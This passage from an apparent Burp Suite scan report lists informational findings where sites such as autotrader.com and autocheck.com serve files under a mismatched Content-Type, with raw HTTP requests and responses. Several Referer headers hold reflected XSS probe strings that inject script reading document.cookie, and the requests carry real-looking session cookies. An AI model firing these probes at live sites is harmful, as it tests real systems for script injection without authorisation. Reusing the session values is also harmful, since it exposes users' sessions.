HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 17
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:53:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:53:46 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:53:45 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/

{ errorCode: 0 }

32.70. http://www.autocheck.com/consumers/stylesheets/images/homepage/homepage_slides/slides_container.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.autocheck.com
Path:	/consumers/stylesheets/images/homepage/homepage_slides/slides_container.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /consumers/stylesheets/images/homepage/homepage_slides/slides_container.jpg HTTP/1.1
Host: www.autocheck.com
Proxy-Connection: keep-alive
Referer: http://www.autocheck.com/?WT.mc_id=1824&siteID=182471a71%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6dab831a574
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.312031295921916242; referralCookie=cQ2iP5kQz9HfdyY962; JSESSIONID=cQ2iP5kQz9HfdyY962; WT_FPC=id=173.193.214.243-1295921924.19297:lv=1295943525442:ss=1295943525442; op327homepage1gum=a03n09k08o271pm06i39i515f; op327homepage1liid=a03n09k08o271pm06i39i515f

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:19:02 GMT
Server: Apache
Cache-Control: private
P3P: policyref="http://www.autocheck.com/w3c/p3p.xml", CP="NON DSP COR NID TAIa OUR NOR STA"
Last-Modified: Thu, 13 Jan 2011 19:32:46 GMT
ETag: "bccaf-54a-4d2f535e"
Accept-Ranges: bytes
Content-Length: 1354
Content-Type: image/jpeg

.PNG
.
...IHDR...............h.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...=K.W....(h.D..B.....;u.....B...;.
...t.RpppV.../\tH.............6.....O.<q9..s.h...V....3D.r9..........._....z{{C>...
...[SNIP]...

32.71. http://www.autocheck.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.autocheck.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.autocheck.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.312031295921916242; referralCookie=cQ2iP5kQz9HfdyY962; JSESSIONID=cQ2iP5kQz9HfdyY962; WT_FPC=id=173.193.214.243-1295921924.19297:lv=1295943525442:ss=1295943525442; op327homepage1gum=a03n09k08o271pm06i39i515f; op327homepage1liid=a03n09k08o271pm06i39i515f

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:19:15 GMT
Server: Apache
Cache-Control: private
P3P: policyref="http://www.autocheck.com/w3c/p3p.xml", CP="NON DSP COR NID TAIa OUR NOR STA"
Last-Modified: Tue, 12 Oct 2010 19:30:26 GMT
ETag: "31ef09-47e-4cb4b752"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain

............ .h.......(....... ..... ..................................n;..g3......................................................R..L...L...M...................................................L...L
...[SNIP]...

32.72. http://www.autotrader.com/ajax/backButtonFix.jsp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.autotrader.com
Path:	/ajax/backButtonFix.jsp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

32.73. http://www.autotrader.com/no_cache/ac/hp_rotating_promos.asis previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.autotrader.com
Path:	/no_cache/ac/hp_rotating_promos.asis

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /no_cache/ac/hp_rotating_promos.asis?rdpage=71015_1_TIMOFREASIER&cache_kill=1295921990056 HTTP/1.1
Host: www.autotrader.com
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; JSESSIONID=9FDC9D8306C6C65BA049C7655627ABAE; ATC_USER_ZIP=; BIGipServerwww=1619582986.61475.0000; mbox=check#true#1295922044|session#1295921983404-727382#1295923844|PC#1295921983404-727382.17#1297131585; ATC_PID=-1761786222|959219900373039673; BIRF_Audit=true

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:19:48 GMT
Server: Apache
Last-Modified: Tue, 02 Nov 2010 16:43:57 GMT
Accept-Ranges: bytes
Content-Length: 185
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/plain

Status: 200 OK
Expires: Thu, 21 Feb 97 12:00:00 GMT
Pragma: no-cache
Cache-control: private
Cache-control: no-cache
Content-type: image/gif

GIF89a.............!.......,...........D..;

32.74. http://www.autotrader.com/no_cache/ac/index_wwwautoconnectcom_ac.asis previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.autotrader.com
Path:	/no_cache/ac/index_wwwautoconnectcom_ac.asis

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /no_cache/ac/index_wwwautoconnectcom_ac.asis?cache_kill=1295921992301 HTTP/1.1
Host: www.autotrader.com
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; JSESSIONID=9FDC9D8306C6C65BA049C7655627ABAE; ATC_USER_ZIP=; BIGipServerwww=1619582986.61475.0000; mbox=check#true#1295922044|session#1295921983404-727382#1295923844|PC#1295921983404-727382.17#1297131585; ATC_PID=-1761786222|959219900373039673; BIRF_Audit=true

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:19:50 GMT
Server: Apache
Last-Modified: Tue, 02 Nov 2010 16:43:57 GMT
Accept-Ranges: bytes
Content-Length: 185
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/plain

Status: 200 OK
Expires: Thu, 21 Feb 97 12:00:00 GMT
Pragma: no-cache
Cache-control: private
Cache-control: no-cache
Content-type: image/gif

GIF89a.............!.......,...........D..;

32.75. http://www.autotrader.com/no_cache/ac/trader_clicks_0001_nocount.asis previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.autotrader.com
Path:	/no_cache/ac/trader_clicks_0001_nocount.asis

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

Response

32.76. http://www.autotrader.com/no_cache/ac/trader_clicks_0002_nocount.asis previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.autotrader.com
Path:	/no_cache/ac/trader_clicks_0002_nocount.asis

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

Response

32.77. http://www.autotrader.com/no_cache/ac/trader_clicks_0005_nocount.asis previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.autotrader.com
Path:	/no_cache/ac/trader_clicks_0005_nocount.asis

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

Response

32.78. http://www.autotrader.com/no_cache/ac/trader_clicks_0006_nocount.asis previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.autotrader.com
Path:	/no_cache/ac/trader_clicks_0006_nocount.asis

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

Response

32.79. http://www.autotrader.com/no_cache/ac/trader_clicks_0009_nocount.asis previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.autotrader.com
Path:	/no_cache/ac/trader_clicks_0009_nocount.asis

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

Response

32.80. http://www.autotrader.com/no_cache/ac/trader_clicks_0016_nocount.asis previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.autotrader.com
Path:	/no_cache/ac/trader_clicks_0016_nocount.asis

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

Response

32.81. http://www.autotraderstatic.com/dwr/interface/MarketManager.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.autotraderstatic.com
Path:	/dwr/interface/MarketManager.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain;charset=ISO-8859-1

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /dwr/interface/MarketManager.js?v=3.17.167500 HTTP/1.1
Host: www.autotraderstatic.com
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: M7F1=CT
If-Modified-Since: Tue, 07 Dec 2010 19:10:54 GMT

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 07 Dec 2010 19:33:57 GMT
Content-Type: text/plain;charset=ISO-8859-1
Cache-Control: max-age=272754
Date: Tue, 25 Jan 2011 02:19:41 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 566

// Provide a default path to dwr.engine
if (dwr == null) var dwr = {};
if (dwr.engine == null) dwr.engine = {};
if (DWREngine == null) var DWREngine = dwr.engine;

if (MarketManager == null) var Mark
...[SNIP]...

32.82. http://www.autotraderstatic.com/dwr/interface/ModelSearchUtil.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.autotraderstatic.com
Path:	/dwr/interface/ModelSearchUtil.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain;charset=ISO-8859-1

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /dwr/interface/ModelSearchUtil.js?v=3.17.167500 HTTP/1.1
Host: www.autotraderstatic.com
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: M7F1=CT

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sat, 01 Jan 2011 21:11:55 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/plain;charset=ISO-8859-1
Cache-Control: max-age=271979
Date: Tue, 25 Jan 2011 02:19:41 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 8644

// Provide a default path to dwr.engine
if (dwr == null) var dwr = {};
if (dwr.engine == null) dwr.engine = {};
if (DWREngine == null) var DWREngine = dwr.engine;

if (ModelSearchUtil == null) var Mo
...[SNIP]...

32.83. http://www.autotraderstatic.com/dwr/interface/UserMsgController.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.autotraderstatic.com
Path:	/dwr/interface/UserMsgController.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain;charset=ISO-8859-1

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /dwr/interface/UserMsgController.js HTTP/1.1
Host: www.autotraderstatic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: M7F1=CT;

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 07 Dec 2010 18:47:16 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/plain;charset=ISO-8859-1
Cache-Control: max-age=449748
Date: Tue, 25 Jan 2011 14:23:53 GMT
Content-Length: 1986
Connection: close

// Provide a default path to dwr.engine
if (dwr == null) var dwr = {};
if (dwr.engine == null) dwr.engine = {};
if (DWREngine == null) var DWREngine = dwr.engine;

if (UserMsgController == null) var
...[SNIP]...

32.84. http://www.autotraderstatic.com/inc/js/Tabber.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.autotraderstatic.com
Path:	/inc/js/Tabber.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /inc/js/Tabber.js?v=3.17.167500 HTTP/1.1
Host: www.autotraderstatic.com
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: M7F1=CT

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 02 Nov 2010 16:44:20 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Cache-Control: max-age=255664
Expires: Fri, 28 Jan 2011 01:20:45 GMT
Date: Tue, 25 Jan 2011 02:19:41 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 5517

if((typeof Prototype=='undefined') ||
(typeof Element == 'undefined') ||
(typeof Element.Methods=='undefined') ||
parseFloat(Prototype.Version.split(".")[0] + "." +
Protot
...[SNIP]...

32.85. http://www.autotraderstatic.com/inc/js/UltraPop.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.autotraderstatic.com
Path:	/inc/js/UltraPop.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /inc/js/UltraPop.js?v=3.17.167500 HTTP/1.1
Host: www.autotraderstatic.com
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: M7F1=CT

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 25 Nov 2010 06:00:52 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Cache-Control: max-age=234501
Expires: Thu, 27 Jan 2011 19:28:02 GMT
Date: Tue, 25 Jan 2011 02:19:41 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 7696

if((typeof Prototype=='undefined') ||
(typeof Element == 'undefined') ||
(typeof Element.Methods=='undefined') ||
parseFloat(Prototype.Version.split(".")[0] + "." +
Prototyp
...[SNIP]...

32.86. http://www.beirut.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.beirut.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:13:21 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 06 Sep 2010 13:16:19 GMT
ETag: "cf002a-47e-48f9716036ec0"
Accept-Ranges: bytes
Cache-Control: max-age=172800
Expires: Thu, 27 Jan 2011 02:13:21 GMT
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Content-Length: 1150

............ .h.......(....... ..... .................................................................................................x...{.....^...a..Z...[..qP..mN..Mg..Br..D...V......H............F.
...[SNIP]...

32.87. http://www.cloudaccess.net/templates/rt_quasar_j15/css/vegur-m_0600-webfont.woff previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.cloudaccess.net
Path:	/templates/rt_quasar_j15/css/vegur-m_0600-webfont.woff

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /templates/rt_quasar_j15/css/vegur-m_0600-webfont.woff HTTP/1.1
Host: www.cloudaccess.net
Proxy-Connection: keep-alive
Referer: http://www.cloudaccess.net/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:05 GMT
Server: Apache/2.2.17 (CentOS)
Last-Modified: Tue, 13 Jul 2010 12:12:20 GMT
ETag: "a8e1f-34fc-48b43c7eb5100"
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Length: 13564

wOFF......4.......R.........................FFTM............W.>.GDEF........... ....GPOS...............7GSUB....... ... l.t.OS/2.......K...`..^.cmap...X.......z..4.cvt .......(...(.F.2fpgm...@.......e
...[SNIP]...

32.88. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /extern/login_status.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dla2day.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.la2day.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Date: Mon, 24 Jan 2011 16:05:02 GMT
Content-Length: 22

Invalid Application ID

32.89. http://www.foxaudiencenetwork.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.foxaudiencenetwork.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.foxaudiencenetwork.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:10:45 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 11 Nov 2010 20:55:05 GMT
ETag: "4a8185-47e-494cd30379c40"
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
nnCoection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ...................................r..h7..m>....u...................................U........._+..G...G...G...G...U....................................U..y..G...G
...[SNIP]...

32.90. http://www.google.com/mbd previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.google.com
Path:	/mbd

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /mbd?q=aub+assemble+usenet+binary&hl=en&prmd=ivns&mbtype=29&resnum=1&tbo=1&docid=17749270341949851663&usg=4a1f&zx=1295880902226 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Date: Mon, 24 Jan 2011 14:54:27 GMT
Expires: -1
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 5967

google.Toolbelt.ascrs('.tbo #ssb #tbp{background-position:-105px -74px}.tbt{margin-bottom:1.2em;font-size:82%}.tbos{padding-top:2px;font-weight:bold}.tbou{padding-top:2px;padding-left:1em}.tbotu{color
...[SNIP]...

32.91. http://www.google.com/recaptcha/api/reload previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.google.com
Path:	/recaptcha/api/reload

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /recaptcha/api/reload?c=03AHJ_VuvSi9ENrnQA2xmcnrhBlqWRQ6MFeaYPJ7nddgl29pJbumqg3KRxiCERqMvgM9G1o9cBf5y24cS-WijOHquhw42I93JgwhIQYQ87sAos5oSf8JsAmt7b3WM_1KqlOsDqlzo_0gA0nHb1IUrbpcRxMb7WEY9iiQ&k=6LcvxgsAAAAAAO9JQTOglTvq6Ycqs2EM7mgFLyiB&reason=t&type=image&lang=en HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://demo.joomla.org/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Mon, 24 Jan 2011 07:16:30 GMT
Content-Type: text/javascript
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 201

Recaptcha.finish_reload('03AHJ_VussAUzzkp_SC3CMdlMGqAGizLmn2Oe6RDe575sf6STXC9cLql3o2_sCsgnGld3M2kk2xdKHIrqYSaIyo4CXI_263YSqYYdm-nXOz9LHdtW_CCH1a1TyfpmPM0jk7hXopd_oFInWDi296bN_BF3hpII4dRkU7Q', 'image')
...[SNIP]...

32.92. http://www.kbsp.com/x/fonts/AKZIGBEM.TTF previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.kbsp.com
Path:	/x/fonts/AKZIGBEM.TTF

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /x/fonts/AKZIGBEM.TTF HTTP/1.1
Host: www.kbsp.com
Proxy-Connection: keep-alive
Referer: http://www.kbsp.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

32.93. http://www.kbsp.com/x/fonts/AKZIGBES.TTF previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.kbsp.com
Path:	/x/fonts/AKZIGBES.TTF

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

Response

32.94. http://www.lithuanianjoomla.com/media/system/js/mootools-more.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.lithuanianjoomla.com
Path:	/media/system/js/mootools-more.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

Response

32.95. http://www.masjo.com/wp-content/plugins/archieve/images/913e4_new_script_host-39261-1228323711.jpeg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.masjo.com
Path:	/wp-content/plugins/archieve/images/913e4_new_script_host-39261-1228323711.jpeg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /wp-content/plugins/archieve/images/913e4_new_script_host-39261-1228323711.jpeg HTTP/1.1
Host: www.masjo.com
Proxy-Connection: keep-alive
Referer: http://www.masjo.com/search/learn+typing+quick+and+easy+cracka074f%3Cscript%3Ealert(document.cookie)%3C/script%3Ec4a5acfda9b/page/419/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:03:49 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/4.4.9 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Tue, 23 Nov 2010 11:25:06 GMT
ETag: "128ce01-991-495b69fe4c880"
Accept-Ranges: bytes
Content-Length: 2449
Content-Type: image/jpeg

